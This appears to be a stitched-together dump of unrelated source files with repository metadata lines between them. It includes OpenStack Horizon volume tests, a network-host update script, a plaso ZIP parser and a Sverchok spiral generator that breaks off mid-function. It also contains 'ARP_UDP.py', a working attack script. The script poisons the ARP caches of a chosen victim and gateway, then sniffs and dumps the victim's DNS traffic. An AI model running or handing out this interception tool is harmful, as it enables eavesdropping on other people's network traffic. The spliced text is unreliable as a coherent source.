'image_id': '2faa080b-dd56-4bf0-8f0a-0d4627d8f306',
'image_name': 'test',
'size': '2',
'status': 'uploading'}
form_data = {'id': volume.id,
'name': volume.name,
'image_name': 'testimage',
'force': True,
'container_format': 'bare',
'disk_format': 'raw'}
mock_schemas_list.return_value = self.image_schemas.first()
mock_get.return_value = volume
mock_upload.return_value = loaded_resp
url = reverse('horizon:project:volumes:upload_to_image',
args=[volume.id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
self.assertMessageCount(info=1)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_upload.assert_called_once_with(test.IsHttpRequest(),
form_data['id'],
form_data['force'],
form_data['image_name'],
form_data['container_format'],
form_data['disk_format'])
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'volume_extend')
@mock.patch.object(cinder, 'volume_get')
def test_extend_volume(self, mock_get, mock_extend, mock_quotas):
volume = self.cinder_volumes.first()
formData = {'name': 'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 120}
mock_get.return_value = volume
mock_quotas.return_value = self.cinder_quota_usages.first()
mock_extend.return_value = volume
url = reverse('horizon:project:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once()
mock_extend.assert_called_once_with(test.IsHttpRequest(), volume.id,
formData['new_size'])
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'volume_get')
def test_extend_volume_with_wrong_size(self, mock_get, mock_quotas):
volume = self.cinder_volumes.first()
formData = {'name': 'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 10}
mock_get.return_value = volume
mock_quotas.return_value = self.cinder_quota_usages.first()
url = reverse('horizon:project:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
self.assertFormErrors(res, 1,
"New size must be greater than "
"current size.")
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once()
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_retype_volume_supported_action_item(self, mock_get,
mock_limits, mock_quotas):
volume = self.cinder_volumes.get(name='v2_volume')
limits = self.cinder_limits['absolute']
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(url, {}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
self.assertContains(res, 'Change Volume Type')
self.assertContains(res, 'retype')
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({
cinder: ['volume_type_list',
'volume_retype',
'volume_get']
})
def test_retype_volume(self):
volume = self.cinder_volumes.get(name='my_volume2')
volume_type = self.cinder_volume_types.get(name='vol_type_1')
form_data = {'id': volume.id,
'name': volume.name,
'volume_type': volume_type.name,
'migration_policy': 'on-demand'}
self.mock_volume_get.return_value = volume
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_retype.return_value = True
url = reverse('horizon:project:volumes:retype',
args=[volume.id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_retype.assert_called_once_with(
test.IsHttpRequest(), volume.id,
form_data['volume_type'], form_data['migration_policy'])
def test_encryption_false(self):
self._test_encryption(False)
def test_encryption_true(self):
self._test_encryption(True)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits'],
})
def _test_encryption(self, encryption):
volumes = self.cinder_volumes.list()
for volume in volumes:
volume.encrypted = encryption
limits = self.cinder_limits['absolute']
self.mock_volume_backup_supported.return_value = False
self.mock_volume_list_paged.return_value = [self.cinder_volumes.list(),
False, False]
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
rows = res.context['volumes_table'].get_rows()
column_value = 'Yes' if encryption else 'No'
for row in rows:
self.assertEqual(row.cells['encryption'].data, column_value)
self.assertEqual(10, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
sort_dir='desc', search_opts=None,
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.assertEqual(13, self.mock_tenant_absolute_limits.call_count)
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'volume_get')
def test_extend_volume_with_size_out_of_quota(self, mock_get, mock_quotas):
volume = self.cinder_volumes.first()
usage_limit = self.cinder_quota_usages.first()
usage_limit.add_quota(api.base.Quota('gigabytes', 100))
usage_limit.tally('gigabytes', 20)
usage_limit.tally('volumes', len(self.cinder_volumes.list()))
formData = {'name': 'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 1000}
mock_quotas.return_value = usage_limit
mock_get.return_value = volume
url = reverse('horizon:project:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
self.assertFormError(res, "form", "new_size",
"Volume cannot be extended to 1000GiB as "
"the maximum size it can be extended to is "
"120GiB.")
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
self.assertEqual(2, mock_quotas.call_count)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits'],
})
def test_create_transfer_availability(self):
limits = self.cinder_limits['absolute']
self.mock_volume_backup_supported.return_value = False
self.mock_volume_list_paged.return_value = [self.cinder_volumes.list(),
False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
table = res.context['volumes_table']
# Verify that the create transfer action is present if and only if
# the volume is available
for vol in table.data:
actions = [a.name for a in table.get_row_actions(vol)]
self.assertEqual('create_transfer' in actions,
vol.status == 'available')
self.assertEqual(10, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
sort_dir='desc', search_opts=None,
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(13, self.mock_tenant_absolute_limits.call_count)
@mock.patch.object(cinder, 'transfer_get')
@mock.patch.object(cinder, 'transfer_create')
def test_create_transfer(self, mock_transfer_create, mock_transfer_get):
volumes = self.cinder_volumes.list()
volToTransfer = [v for v in volumes if v.status == 'available'][0]
formData = {'volume_id': volToTransfer.id,
'name': 'any transfer name'}
transfer = self.cinder_volume_transfers.first()
mock_transfer_create.return_value = transfer
mock_transfer_get.return_value = transfer
# Create a transfer for the first available volume
url = reverse('horizon:project:volumes:create_transfer',
args=[volToTransfer.id])
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
mock_transfer_create.assert_called_once_with(test.IsHttpRequest(),
formData['volume_id'],
formData['name'])
mock_transfer_get.assert_called_once_with(test.IsHttpRequest(),
transfer.id)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'transfer_delete',
'tenant_absolute_limits'],
})
def test_delete_transfer(self):
transfer = self.cinder_volume_transfers.first()
volumes = []
# Attach the volume transfer to the relevant volume
for v in self.cinder_volumes.list():
if v.id == transfer.volume_id:
v.status = 'awaiting-transfer'
v.transfer = transfer
volumes.append(v)
formData = {'action':
'volumes__delete_transfer__%s' % transfer.volume_id}
self.mock_volume_backup_supported.return_value = False
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertNoFormErrors(res)
self.assertIn('Successfully deleted volume transfer "test transfer"',
[m.message for m in res.context['messages']])
self.assertEqual(5, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
search_opts=None, sort_dir='desc',
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_transfer_delete.assert_called_once_with(test.IsHttpRequest(),
transfer.id)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(8, self.mock_tenant_absolute_limits.call_count)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits',
'transfer_accept']
})
def test_accept_transfer(self):
transfer = self.cinder_volume_transfers.first()
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
formData = {'transfer_id': transfer.id, 'auth_key': transfer.auth_key}
url = reverse('horizon:project:volumes:accept_transfer')
res = self.client.post(url, formData, follow=True)
self.assertNoFormErrors(res)
self.mock_transfer_accept.assert_called_once_with(test.IsHttpRequest(),
transfer.id,
transfer.auth_key)
self.assertEqual(3, self.mock_tenant_absolute_limits.call_count)
self.mock_server_list.assert_called_once()
self.mock_volume_list_paged.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once()
self.mock_transfer_accept.assert_called_once()
@mock.patch.object(cinder, 'transfer_get')
def test_download_transfer_credentials(self, mock_transfer):
transfer = self.cinder_volume_transfers.first()
filename = "{}.txt".format(slugify(transfer.id))
url = reverse('horizon:project:volumes:'
'download_transfer_creds',
kwargs={'transfer_id': transfer.id,
'auth_key': transfer.auth_key})
res = self.client.get(url)
self.assertTrue(res.has_header('content-disposition'))
self.assertTrue(res.has_header('content-type'))
self.assertEqual(res.get('content-disposition'),
'attachment; filename={}'.format(filename))
self.assertEqual(res.get('content-type'), 'application/text')
self.assertIn(transfer.id, res.content.decode('utf-8'))
self.assertIn(transfer.auth_key, res.content.decode('utf-8'))
mock_transfer.assert_called_once_with(test.IsHttpRequest(),
transfer.id)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits',
'volume_get'],
})
def test_create_backup_availability(self):
limits = self.cinder_limits['absolute']
self.mock_volume_backup_supported.return_value = True
self.mock_volume_list_paged.return_value = [self.cinder_volumes.list(),
False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
table = res.context['volumes_table']
# Verify that the create backup action is present if and only if
# the volume is available or in-use
for vol in table.data:
actions = [a.name for a in table.get_row_actions(vol)]
self.assertEqual('backups' in actions,
vol.status in ('available', 'in-use'))
self.assertEqual(10, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
sort_dir='desc', search_opts=None,
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(13, self.mock_tenant_absolute_limits.call_count)
|
apache-2.0
| 5,897,069,910,118,493,000
| 44.455019
| 79
| 0.577588
| false
| 4.073708
| true
| false
| false
|
efimlosev/corpcolo
|
noc-ps/add_server.py
|
1
|
2912
|
from json_p_n import sendRecieve
import pexpect,argparse
from sys import path
import subprocess
path.append('/home/efim/Dropbox')
from ipcalc_flask import calculateSubnet as calc
def Main():
parser = argparse.ArgumentParser()
parser.add_argument('subnet', help='Give me a subnet', type=str) #optinal argument
parser.add_argument('vlan', help='We need a vlan here', type=str) #the same
parser.add_argument('desc', help='We need a description here', type=str) #the same
parser.add_argument('hostname', nargs='?', help='We need a hostname here', type=str) #the same
parser.add_argument('-i', help='We need an Ip here', type=str) #the same
args = parser.parse_args()
temp = addUrl(args.subnet,args.vlan,args.desc)
temp1 = getAllinformationWeWantiToUpdate(temp,{'hostname': args.hostname},args.i)
updateHost(temp1,args.vlan,args.desc)
def addUrl(subnet,vlan,desc):
tmp = calc(subnet)
sub = str(tmp[0])
gw = str(tmp[1])
ip = str(tmp[2]).split(' - ')[0]
nm = str(tmp[3])
servername, descrend = desc.split(' ')
tmp = None
tmp = sendRecieve('addSubnet',{'subnet': sub, 'gateway': gw, 'netmask': nm, 'vlan' : vlan, 'description': desc})
print tmp['result']['success']
ipSub = { 'ip':ip, 'subnet': sub, 'descrend' : descrend, 'servername' : servername }
return ipSub
def getAllinformationWeWantiToUpdate(ipsub,hostname,ip=None):
ipsub.update(hostname)
if ip != None:
ipsub['ip'] = ip
# print ipsub
return ipsub
def updateHost(whatWeWantToUpdate,vlan,desc ):
hosts = sendRecieve("searchHosts", {'start': 0, 'limit': 100, 'query': whatWeWantToUpdate['servername'] })['result']['data']
exactHost = [ host for host in hosts if host['descr'].split('(')[0] == whatWeWantToUpdate['servername']]
#print exactHost[0]['descr']
for k,v in exactHost[0].iteritems():
if k in whatWeWantToUpdate:
exactHost[0][k] = whatWeWantToUpdate[k]
exactHost[0]['descr'] = str(exactHost[0]['descr'].split(')')[0] + ')' + whatWeWantToUpdate['descrend'])
print exactHost[0]['pool']
connection = sendRecieve("getConnectionsByHost", exactHost[0]['mac'])['result']['data']
switchName = connection[0]['devname']
switchPort = connection[0]['portdescr'].split(' ')[1].split('[')[1].split(']')[0]
devices = sendRecieve("getDevices", 0, 1000)['result']['data']
switchIp = [device['ip'] for device in devices if device['name'] == switchName ][0]
if exactHost[0]['pool'] != 16:
print 'Something went wrong, exitting!'
exit()
print sendRecieve("getConnectionsByHost", exactHost[0]['mac'])
print exactHost[0]['ip']
print sendRecieve("updateHost", exactHost[0])
subprocess.check_call(['/home/efim/Dropbox/sshs_rem.sh', switchIp, switchPort, vlan, desc])
if __name__ == '__main__':
Main()
#updateHost('710A6R22', {'descr': 'test'})
|
gpl-2.0
| -1,418,926,991,163,073,500
| 40.6
| 127
| 0.650755
| false
| 3.228381
| false
| false
| false
|
Dylan-halls/Network-Exploitation-Toolkit
|
PacketBlocker/ARP_UDP.py
|
1
|
2931
|
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import threading
from termcolor import colored
os.system("clear")
print("""
____ ___________ __________
| | \______ ______ )
| | /| | \| ___)
| | / | ` \ |
|______/ /_______ /____|
\/
""")
os.system('echo 0 > /proc/sys/net/ipv4/ip_forward')
VIP = input("\nVictim: ")
GW = input("Gateway: ")
IFACE = input("Interface: ")
str(GW)
str(VIP)
str(IFACE)
def pkthandler(pkt):
try:
ip = pkt[IP]
except IndexError:
pass
try:
src = ip.src
dst = ip.dst
except UnboundLocalError:
pass
if pkt.haslayer(UDP):
udp = pkt[UDP]
print("--------------------------------------------------------\n\n")
print(" .:{}:. ".format(colored('UDP','red')))
print(" ")
print(" \033[1;36mSource IP:\033[00m {} \033[1;36mDestination IP:\033[00m {}".format(src, dst))
print(" \033[1;36mSource Port:\033[00m {} \033[1;36mDestination Port:\033[00m {}".format(udp.sport, udp.dport))
print(" \033[1;36mLength:\033[00m {} ".format(udp.len))
print(" \033[1;36mChecksum:\033[00m {} ".format(udp.chksum))
rawLoad = pkt.getlayer(Raw)
if rawLoad == None: pass
else:
print(" \033[1;36mRaw:\n\n\033[00m {} ".format(rawLoad))
print(" ")
print(" ")
hexdump(pkt)
def v_poison():
v = ARP(pdst=VIP, psrc=GW,)
while True:
try:
send(v,verbose=0,inter=1,loop=1)
except KeyboardInterupt: # Functions constructing and sending the ARP packets
sys.exit(1)
def gw_poison():
gw = ARP(pdst=GW, psrc=VIP)
while True:
try:
send(gw,verbose=0,inter=1,loop=1)
except KeyboardInterupt:
sys.exit(1)
def format_muti_lines(prefix, string, size=80):
size -= len(prefix)
if isinstance(string, bytes):
string = ''.join(r'\x{:02x}'.format(byte) for byte in string)
if size % 2:
size -= 1
return '\n'.join([prefix + line for line in textwrap.wrap(string, size)])
vthread = []
gwthread = []
while True: # Threads
vpoison = threading.Thread(target=v_poison)
vpoison.setDaemon(True)
vthread.append(vpoison)
vpoison.start()
gwpoison = threading.Thread(target=gw_poison)
gwpoison.setDaemon(True)
gwthread.append(gwpoison)
gwpoison.start()
try:
pkt = sniff(iface=str(IFACE),filter='udp port 53',prn=pkthandler)
except KeyboardInterrupt:
os.system("{ cd ..; python3 net.py; }")
exit(0)
if __name__ == "__main__":
UDP()
|
mit
| -8,585,580,230,848,259,000
| 26.92381
| 118
| 0.493347
| false
| 3.293258
| false
| false
| false
|
rgayon/plaso
|
plaso/parsers/czip.py
|
1
|
2615
|
# -*- coding: utf-8 -*-
"""This file contains a parser for compound ZIP files."""
from __future__ import unicode_literals
import struct
import zipfile
from plaso.lib import errors
from plaso.parsers import interface
from plaso.parsers import logger
from plaso.parsers import manager
class CompoundZIPParser(interface.FileObjectParser):
"""Shared functionality for parsing compound zip files.
Compound zip files are zip files used as containers to create another file
format, as opposed to archives of unrelated files.
"""
NAME = 'czip'
DATA_FORMAT = 'Compound ZIP file'
_plugin_classes = {}
def ParseFileObject(self, parser_mediator, file_object):
"""Parses a compound ZIP file-like object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file cannot be parsed.
"""
display_name = parser_mediator.GetDisplayName()
if not zipfile.is_zipfile(file_object):
raise errors.UnableToParseFile(
'[{0:s}] unable to parse file: {1:s} with error: {2:s}'.format(
self.NAME, display_name, 'Not a Zip file.'))
try:
zip_file = zipfile.ZipFile(file_object, 'r', allowZip64=True)
self._ProcessZipFileWithPlugins(parser_mediator, zip_file)
zip_file.close()
# Some non-ZIP files return true for is_zipfile but will fail with a
# negative seek (IOError) or another error.
except (zipfile.BadZipfile, struct.error) as exception:
raise errors.UnableToParseFile(
'[{0:s}] unable to parse file: {1:s} with error: {2!s}'.format(
self.NAME, display_name, exception))
def _ProcessZipFileWithPlugins(self, parser_mediator, zip_file):
"""Processes a zip file using all compound zip files.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
zip_file (zipfile.ZipFile): the zip file. It should not be closed in
this method, but will be closed in ParseFileObject().
"""
archive_members = zip_file.namelist()
for plugin in self._plugins:
try:
plugin.UpdateChainAndProcess(
parser_mediator, zip_file=zip_file, archive_members=archive_members)
except errors.WrongCompoundZIPPlugin as exception:
logger.debug('[{0:s}] wrong plugin: {1!s}'.format(
self.NAME, exception))
manager.ParsersManager.RegisterParser(CompoundZIPParser)
|
apache-2.0
| 3,504,794,705,852,098,000
| 33.407895
| 80
| 0.690631
| false
| 3.926426
| false
| false
| false
|
DolphinDream/sverchok
|
nodes/generators_extended/spiral_mk2.py
|
1
|
22191
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
from bpy.props import IntProperty, FloatProperty, BoolProperty, EnumProperty
from math import sin, cos, pi, sqrt, exp, atan, log
import re
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import updateNode, match_long_repeat, get_edge_list
from sverchok.utils.sv_easing_functions import *
from sverchok.utils.sv_transform_helper import AngleUnits, SvAngleHelper
PHI = (sqrt(5) + 1) / 2 # the golden ratio
PHIPI = 2 * log(PHI) / pi # exponent for the Fibonacci (golden) spiral
spiral_type_items = [
("ARCHIMEDEAN", "Archimedean", "Generate an archimedean spiral.", 0),
("LOGARITHMIC", "Logarithmic", "Generate a logarithmic spiral.", 1),
("SPHERICAL", "Spherical", "Generate a spherical spiral.", 2),
("OVOIDAL", "Ovoidal", "Generate an ovoidal spiral.", 3),
("CORNU", "Cornu", "Generate a cornu spiral.", 4),
("EXO", "Exo", "Generate an exo spiral.", 5),
("SPIRANGLE", "Spirangle", "Generate a spirangle spiral.", 6)
]
# name : [ preset index, type, eR, iR, exponent, turns, resolution, scale, height ]
spiral_presets = {
" ": (0, "", 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0),
# archimedean spirals
"ARCHIMEDEAN": (10, "ARCHIMEDEAN", 1.0, 0.0, 1.0, 7, 100, 1.0, 0.0),
"PARABOLIC": (11, "ARCHIMEDEAN", 1.0, 0.0, 2.0, 5, 100, 1.0, 0.0),
"HYPERBOLIC": (12, "ARCHIMEDEAN", 1.0, 0.0, -1.0, 11, 100, 1.0, 0.0),
"LITUUS": (13, "ARCHIMEDEAN", 1.0, 0.0, -2.0, 11, 100, 1.0, 0.0),
# logarithmic spirals
"FIBONACCI": (20, "LOGARITHMIC", 1.0, 0.5, PHIPI, 3, 100, 1.0, 0.0),
# 3D spirals (mix type)
"CONICAL": (30, "ARCHIMEDEAN", 1.0, 0.0, 1.0, 7, 100, 1.0, 3.0),
"HELIX": (31, "LOGARITHMIC", 1.0, 0.0, 0.0, 7, 100, 1.0, 4.0),
"SPHERICAL": (32, "SPHERICAL", 1.0, 0.0, 0.0, 11, 55, 1.0, 0.0),
"OVOIDAL": (33, "OVOIDAL", 5.0, 1.0, 0.0, 7, 55, 1.0, 6.0),
# spiral odities
"CORNU": (40, "CORNU", 1.0, 1.0, 1.0, 5, 55, 1.0, 0.0),
"EXO": (41, "EXO", 1.0, 0.1, PHI, 11, 101, 1.0, 0.0),
# choppy spirals
"SPIRANGLE SC": (50, "SPIRANGLE", 1.0, 0.0, 0.0, 8, 4, 1.0, 0.0),
"SPIRANGLE HX": (51, "SPIRANGLE", 1.0, 0.0, 0.5, 7, 6, 1.0, 0.)
}
normalize_items = [
("ER", "eR", "Normalize spiral to the external radius.", 0),
("IR", "iR", "Normalize spiral to the internal radius.", 1)
]
def make_archimedean_spiral(settings):
'''
eR : exterior radius (end radius)
iR : interior radius (start radius)
exponent : rate of growth (between iR and eR)
turns : number of turns in the spiral
N : curve resolution per turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns * sign
epsilon = 1e-5 if exponent < 0 else 0 # to avoid raising zero to negative power
exponent = 1e-2 if exponent == 0 else exponent # to avoid division by zero
dR = eR - iR # radius range : cached for performance
ex = 1 / exponent # inverse exponent : cached for performance
N = N * turns # total number of points in the spiral
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t + phase
r = (iR + dR * (t + epsilon) ** ex) * scale # essentially: r = a * t ^ (1/b)
x = r * cos(phi)
y = r * sin(phi)
z = height * t
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_logarithmic_spiral(settings):
'''
eR : exterior radius
iR : interior radius
exponent : rate of growth
turns : number of turns in the spiral
N : curve resolution per turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns
N = N * turns # total number of points in the spiral
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t
r = eR * exp(exponent * phi) * scale # essentially: r = a * e ^ (b*t)
pho = phi * sign + phase # final angle : cached for performance
x = r * sin(pho)
y = r * cos(pho)
z = height * t
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_spherical_spiral(settings):
'''
This is the approximate sperical spiral that has a finite length,
where the phi & theta angles sweep their ranges at constant rates.
eR : exterior radius
iR : interior radius (UNUSED)
exponent : rate of growth (sigmoid in & out)
turns : number of turns in the spiral
N : the curve resolution of one turn
scale : overall scale of the curve
height : the height of the spiral along z (UNUSED)
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns * sign
N = N * turns # total number of points in the spiral
es = prepareExponentialSettings(2, exponent + 1e-5) # used for easing
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t + phase
a = ExponentialEaseInOut(t, es) # ease theta variation
theta = -pi / 2 + pi * a
RxCosTheta = (iR + eR * cos(theta)) * scale # cached for performance
x = cos(phi) * RxCosTheta
y = sin(phi) * RxCosTheta
z = eR * sin(theta)
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_ovoidal_spiral(settings):
'''
eR : exterior radius (vertical cross section circles)
iR : interior radius (horizontal cross section circle)
exponent : rate of growth (sigmoid in & out)
turns : number of turns in the spiral
N : the curve resolution of one turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns * sign
# derive eR based on iR and height (the main parameters)
# eR = [iR - (H/2)^2/iR]/2 ::: H = 2 * sqrt(2*iR*eR - iR*iR)
eR = 0.5 * (iR + 0.25 * height * height / iR)
eR2 = eR * eR # cached for performance
dR = eR - iR # cached for performance
N = N * turns # total number of points in the spiral
es = prepareExponentialSettings(2, exponent + 1e-5) # used for easing
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t + phase
a = ExponentialEaseInOut(t, es) # ease theta variation
theta = -pi / 2 + pi * a
h = 0.5 * height * sin(theta) # [-H/2, +H/2]
r = sqrt(eR2 - h * h) - dR # [0 -> iR -> 0]
x = r * cos(phi) * scale
y = r * sin(phi) * scale
z = h * scale
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_cornu_spiral(settings):
'''
L : length
N : resolution
S : scale
M :
x(t) = s * Integral(0,t) { cos(pi*u*u/2) du }
y(t) = s * Integral(0,t) { sin(pi*u*u/2) du }
TODO : refine the math (smoother curve, adaptive res, faster computation)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
N = N * turns # total number of points in the spiral
L = iR * turns # length
S = eR * scale # overall scale
es = prepareExponentialSettings(2, exponent + 1e-5) # used for easing
verts1 = [] # pozitive spiral verts
verts2 = [] # nagative spiral verts
norms = []
add_vert1 = verts1.append
add_vert2 = verts2.append
add_norm = norms.append
l1 = 0
x = 0
y = 0
for n in range(N + 1):
t = n / N # t = [0,1]
a = QuadraticEaseOut(t)
# a = ExponentialEaseOut(t, es)
l = L * a # l = [0, +L]
r = x * x + y * y
# print("r=", r)
# M = 100 + int(300 * pow(r, exponent)) # integral steps
M = 100 + int(100 * a) # integral steps
l2 = l
# integral from l1 to l2
u = l1
du = (l2 - l1) / M
for m in range(M + 1):
u = u + du # u = [l1, l2]
phi = u * u * pi / 2
x = x + cos(phi) * du
y = y + sin(phi) * du
l1 = l2
# scale and flip
xx = x * S
yy = y * S * sign
# rotate by phase amount
px = xx * cos(phase) - yy * sin(phase)
py = xx * sin(phase) + yy * cos(phase)
pz = height * t
add_vert1([px, py, pz]) # positive spiral verts
add_vert2([-px, -py, -pz]) # netative spiral verts
verts = verts2[::-1] + verts1
edges = get_edge_list(N)
return verts, edges, norms
def make_exo_spiral(settings):
'''
This is an exponential in & out between two circles
eR : exterior radius
iR : interior radius
exponent : rate of growth (SIGMOID : exponential in & out)
turns : number of turns in the spiral
N : the curve resolution of one turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = 1 if flip else -1 # flip direction ?
max_phi = 2 * pi * turns * sign
N = N * turns # total number of points in the spiral
es = prepareExponentialSettings(11, exponent + 1e-5) # used for easing
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
a = ExponentialEaseInOut(t, es) # ease radius variation (SIGMOID)
r = (iR + (eR - iR) * a) * scale
phi = max_phi * t + phase
x = r * cos(phi)
y = r * sin(phi)
z = height * t
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_spirangle_spiral(settings):
'''
eR : exterior radius (end radius)
iR : interior radius (start radius)
exponent : rate of growth
turns : number of turns in the spiral
N : curve resolution per turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
